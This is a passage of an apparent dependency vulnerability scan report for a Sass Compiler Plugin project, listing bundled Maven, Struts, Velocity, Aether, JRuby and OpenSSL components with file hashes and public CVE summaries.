File Path: /var/tmp/maven-repo/org/apache/maven/maven-repository-metadata/3.3.9/maven-repository-metadata-3.3.9.jar
MD5: a518f665a8e0c80cd7b37d7e19e90095
SHA1: 6850232b35e504057d67bde11efddebf6271e1ce
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-settings-builder-3.3.9.jar

Description: The effective settings builder, with inheritance and password decryption.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-settings-builder/3.3.9/maven-settings-builder-3.3.9.jar
MD5: 20834b05fa4db46b67c963f3e1b91ed5
SHA1: fe5ad82564dc07a31855da543db8d5376def3c26
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-settings-3.3.9.jar

Description: Maven Settings model.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-settings/3.3.9/maven-settings-3.3.9.jar
MD5: 9d67ab18c16b98763ee9142e87b62d22
SHA1: 68d4180c51468ae8f45869f8f9c569092262fcca
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-plugin-annotations-3.4.jar

Description: Java 5 annotations to use in Mojos

File Path: /var/tmp/maven-repo/org/apache/maven/plugin-tools/maven-plugin-annotations/3.4/maven-plugin-annotations-3.4.jar
MD5: c35fde211323d4bb06d5b1a41ef23807
SHA1: 18624421fb35f5ade7397c18b40878396f672bc5
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-reporting-api-3.0.jar

Description: API to manage report generation.

File Path: /var/tmp/maven-repo/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.jar
MD5: 48cd00abc388c5156879b335e869adab
SHA1: b2541dd07d08cd5eff9bd4554a2ad6a4198e2dfe
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-reporting-impl-2.4.jar

Description: Abstract classes to manage report generation.

File Path: /var/tmp/maven-repo/org/apache/maven/reporting/maven-reporting-impl/2.4/maven-reporting-impl-2.4.jar
MD5: dcee359d96eb75ba8665dded8f117d23
SHA1: 90004c570cfad44712cc42a4ee8167e13f227420
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-shared-utils-0.8.jar

File Path: /var/tmp/maven-repo/org/apache/maven/shared/maven-shared-utils/0.8/maven-shared-utils-0.8.jar
MD5: b94a3d2b3e177dfcac19d8980d03099b
SHA1: bb2d10333e4c7c4cdc25f3c1acb34a74c098568c
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-shared-utils-0.8.jar/META-INF/maven/commons-io/commons-io/pom.xml

Description:  The Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.

File Path: /var/tmp/maven-repo/org/apache/maven/shared/maven-shared-utils/0.8/maven-shared-utils-0.8.jar/META-INF/maven/commons-io/commons-io/pom.xml
MD5: 8dcc8cd4255c1f23e7f58780a943cefb
SHA1: 1ef24807b2eaf9d51b5587710878146d630cc855

Identifiers

  • maven: commons-io:commons-io:2.2   Confidence:HIGH

wagon-provider-api-2.10.jar

Description: Maven Wagon API that defines the contract between different Wagon implementations

File Path: /var/tmp/maven-repo/org/apache/maven/wagon/wagon-provider-api/2.10/wagon-provider-api-2.10.jar
MD5: d03edb1bcae2b9c32a6b68c8333b4b6d
SHA1: 0cd9cdde3f56bb5250d87c54592f04cbc24f03bf
Referenced In Project: Sass Compiler Plugin

Identifiers

struts-core-1.3.8.jar

File Path: /var/tmp/maven-repo/org/apache/struts/struts-core/1.3.8/struts-core-1.3.8.jar
MD5: 868de456b4d4331d6dcc4e8d3bee884e
SHA1: 66178d4a9279ebb1cd1eb79c10dc204b4199f061
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions:

struts-taglib-1.3.8.jar

File Path: /var/tmp/maven-repo/org/apache/struts/struts-taglib/1.3.8/struts-taglib-1.3.8.jar
MD5: 0effb2e71f676c25d76c3ae5dd6674f9
SHA1: e87e9817bdf03c2367fb5f6d5ead953db2df4c21
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions:

struts-tiles-1.3.8.jar

File Path: /var/tmp/maven-repo/org/apache/struts/struts-tiles/1.3.8/struts-tiles-1.3.8.jar
MD5: f41992ab2729b1cb9c6b4721465aa4e4
SHA1: 6d212f8ea5d908bc9906e669428b7694dff60785
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions:

velocity-tools-2.0.jar

Description: VelocityTools is an integrated collection of Velocity subprojects with the common goal of creating tools and infrastructure to speed and ease development of both web and non-web applications using the Velocity template engine.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.jar
MD5: 51ed2c6c0103cf3fdbeb9aa5170f5288
SHA1: 69936384de86857018b023a8c56ae0635c56b6a0
Referenced In Project: Sass Compiler Plugin

Identifiers

velocity-1.5.jar

Description: Apache Velocity is a general purpose template engine.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/apache/velocity/velocity/1.5/velocity-1.5.jar
MD5: 8d46d30a37e1cf2047cdfa73c552e8a9
SHA1: 09f306baf7523ffc0e81a6353d08a584d254133b
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-classworlds-2.5.2.jar

Description: A class loader framework

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar
MD5: 53b54feee8cef6b843bd6748bda4bfa7
SHA1: 4abb111bfdace5b8167db4c0ef74644f3f88f142
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-component-annotations-1.6.jar

Description: Plexus Component "Java 5" Annotations, to describe plexus components properties in java sources with standard annotations instead of javadoc annotations.

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.jar
MD5: 5ad66cc6f2b6813485d624ed581d61be
SHA1: 1a34a4e12b5fded8c548a568f463dfee21500927
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-container-default-1.0-alpha-9-stable-1.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.jar
MD5: 99533a9d3e0fa3280cd0bd3426c5f99b
SHA1: 94aea3010e250a334d9dab7f591114cd6c767458
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-i18n-1.0-beta-7.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-i18n/1.0-beta-7/plexus-i18n-1.0-beta-7.jar
MD5: 65d4f673bd0c49dbc67e020e96b00753
SHA1: 3690f10a668b3c7ac2ef563f14cfb6b2ba30ee57
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-interpolation-1.21.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-interpolation/1.21/plexus-interpolation-1.21.jar
MD5: 6629656495f4e5eac4f244fe3b252ea1
SHA1: f92de59d295f16868001644acc21720f3ec9eb15
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-utils-3.0.22.jar

Description: A collection of various utility classes to ease working with strings, files, command lines, XML and more.

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar
MD5: 2a32677a099da7c5b9b2b39c066f2cc6
SHA1: 764f26e0ab13a87c48fe55f525dfb6a133b7a92f
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-velocity-1.1.7.jar

File Path: /var/tmp/maven-repo/org/codehaus/plexus/plexus-velocity/1.1.7/plexus-velocity-1.1.7.jar
MD5: d460d060e07b3bccaf6593440ce7be1e
SHA1: 1440fc2552d1405b1c2d380ef3b96c4d9c6dbd0b
Referenced In Project: Sass Compiler Plugin

Identifiers

aether-api-1.0.2.v20150114.jar

Description: The application programming interface for the repository system.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-api/1.0.2.v20150114/aether-api-1.0.2.v20150114.jar
MD5: 17cca827aa6a828de92225021df327a7
SHA1: 839f93a5213fb3e233b09bfd6d6b95669f7043c0
Referenced In Project: Sass Compiler Plugin

Identifiers

aether-impl-1.0.2.v20150114.jar

Description: An implementation of the repository system.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-impl/1.0.2.v20150114/aether-impl-1.0.2.v20150114.jar
MD5: 90c5812e3e05a2419b47edd075920c3b
SHA1: f147539e6e60dfbda9ef7f6d750066170f61b7a1
Referenced In Project: Sass Compiler Plugin

Identifiers

aether-spi-1.0.2.v20150114.jar

Description: The service provider interface for repository system implementations and repository connectors.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-spi/1.0.2.v20150114/aether-spi-1.0.2.v20150114.jar
MD5: 27c2dcac7a0cd4818874d2c14abfd34e
SHA1: 8428dfa330107984f3e3ac05cc3ebd50b2676866
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2010-4647  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE before 3.6.2 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) help/index.jsp or (2) help/advanced/content.jsp.

Vulnerable Software & Versions:

CVE-2008-7271  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.

Vulnerable Software & Versions:

aether-util-1.0.2.v20150114.jar

Description: A collection of utility classes to ease usage of the repository system.

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/aether/aether-util/1.0.2.v20150114/aether-util-1.0.2.v20150114.jar
MD5: ae0f47f571109fe3b7b40a7dea085714
SHA1: d2d3c74a5210544b5cdce89a2c1d1c62835692d1
Referenced In Project: Sass Compiler Plugin

Identifiers

org.eclipse.sisu.inject-0.3.2.jar

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar
MD5: d3cb5c4eafb5f15dbfb73ae34d630394
SHA1: 59044b92ec27cc6fda7a2d24b2cd6cec23f31d5b
Referenced In Project: Sass Compiler Plugin

Identifiers

org.eclipse.sisu.plexus-0.3.2.jar

License:

http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar
MD5: ffd4bd3eb3df02572248674218129cba
SHA1: cd84cb43788de23847eec2999070f64381bdb495
Referenced In Project: Sass Compiler Plugin

Identifiers

jruby-complete-9.1.2.0.jar

Description: JRuby 9.1.2.0 OSGi bundle

License:

http://www.gnu.org/licenses/gpl-3.0-standalone.html, http://www.gnu.org/licenses/lgpl-3.0-standalone.html, http://www.eclipse.org/legal/epl-v10.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar
MD5: 5ec62f54f644c1e39e7dd4e418c82fc2
SHA1: 1ba9ec078d5c46583688110ddc7dec912d4c7763
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: jffi-1.2.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/jni/i386-Windows/jffi-1.2.dll
MD5: 841e60814ed6b2971a47b267aef1c58a
SHA1: 07d30c6407fefad8df4b6afc4d85f83e547975ca

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jffi-1.2.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/jni/x86_64-Windows/jffi-1.2.dll
MD5: 5d80b61c1f9e31860c17b3a410948e7e
SHA1: 5ca292116336ee4ceed00d10e756afea580e62cf

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jrubyw.exe

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/bin/jrubyw.exe
MD5: 62b31f26af4b2c0ffe078d17a10c1a7b
SHA1: b9ea7099f43ec31ee907326d4261d778aef9059a

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jar-dependencies-0.3.2.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/jar-dependencies-0.3.2.gemspec
MD5: 9aa4c85e42af99eee1c7436f8d9feea3
SHA1: c2802265d538f551f3c692eb6d65a81e37898819

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jruby-openssl-0.9.15-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/jruby-openssl-0.9.15-java.gemspec
MD5: a476df5aec0907a89cd9eb90af6992a0
SHA1: 07af4c1736cdeded00cb54aa5f230ee9630969ee

Identifiers

CVE-2016-2176  

Severity: Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data.

Vulnerable Software & Versions:

CVE-2016-2109  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding.

Vulnerable Software & Versions:

CVE-2016-2108  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the "negative zero" issue.

Vulnerable Software & Versions:

CVE-2016-2107  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session. NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-0169.

Vulnerable Software & Versions:

CVE-2016-2106  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data.

Vulnerable Software & Versions:

CVE-2016-2105  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data.

Vulnerable Software & Versions:

CVE-2016-0704  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

An oracle protection mechanism in the get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a overwrites incorrect MASTER-KEY bytes during use of export cipher suites, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions:

CVE-2016-0703  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary cipher, which allows man-in-the-middle attackers to determine the MASTER-KEY value and decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions:

CVE-2015-4000  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.

Vulnerable Software & Versions:

CVE-2015-1792  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function.

Vulnerable Software & Versions:

CVE-2015-1791  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier.

Vulnerable Software & Versions:

CVE-2015-1790  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS7_dataDecode function in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data.

Vulnerable Software & Versions:

CVE-2015-1789  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack against a server that supports client authentication with a custom verification callback.

Vulnerable Software & Versions:

CVE-2015-1788  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication.

Vulnerable Software & Versions:

CVE-2015-1787  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The ssl3_get_client_key_exchange function in s3_srvr.c in OpenSSL 1.0.2 before 1.0.2a, when client authentication and an ephemeral Diffie-Hellman ciphersuite are enabled, allows remote attackers to cause a denial of service (daemon crash) via a ClientKeyExchange message with a length of zero.

Vulnerable Software & Versions:

CVE-2015-0293  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (s2_lib.c assertion failure and daemon exit) via a crafted CLIENT-MASTER-KEY message.

Vulnerable Software & Versions:

CVE-2015-0292  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 data that triggers a buffer overflow.

Vulnerable Software & Versions:

CVE-2015-0291  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The sigalgs implementation in t1_lib.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by using an invalid signature_algorithms extension in the ClientHello message during a renegotiation.

Vulnerable Software & Versions:

CVE-2015-0290  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The multi-block feature in the ssl3_write_bytes function in s3_pkt.c in OpenSSL 1.0.2 before 1.0.2a on 64-bit x86 platforms with AES NI support does not properly handle certain non-blocking I/O cases, which allows remote attackers to cause a denial of service (pointer corruption and application crash) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2015-0289  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c.

Vulnerable Software & Versions:

CVE-2015-0288  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow attackers to cause a denial of service (NULL pointer dereference and application crash) via an invalid certificate key.

Vulnerable Software & Versions:

CVE-2015-0287  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse.

Vulnerable Software & Versions:

CVE-2015-0286  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions:

CVE-2015-0285  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_client_hello function in s3_clnt.c in OpenSSL 1.0.2 before 1.0.2a does not ensure that the PRNG is seeded before proceeding with a handshake, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by sniffing the network and then conducting a brute-force attack.

Vulnerable Software & Versions:

CVE-2015-0209  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import.

Vulnerable Software & Versions:

CVE-2015-0208  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ASN.1 signature-verification implementation in the rsa_item_verify function in crypto/rsa/rsa_ameth.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted RSA PSS parameters to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions:

CVE-2015-0207  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The dtls1_listen function in d1_lib.c in OpenSSL 1.0.2 before 1.0.2a does not properly isolate the state information of independent data streams, which allows remote attackers to cause a denial of service (application crash) via crafted DTLS traffic, as demonstrated by DTLS 1.0 traffic to a DTLS 1.2 server.

Vulnerable Software & Versions:

CVE-2015-0204  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations.

Vulnerable Software & Versions:

CVE-2014-8275  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.

Vulnerable Software & Versions:

CVE-2014-8176  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

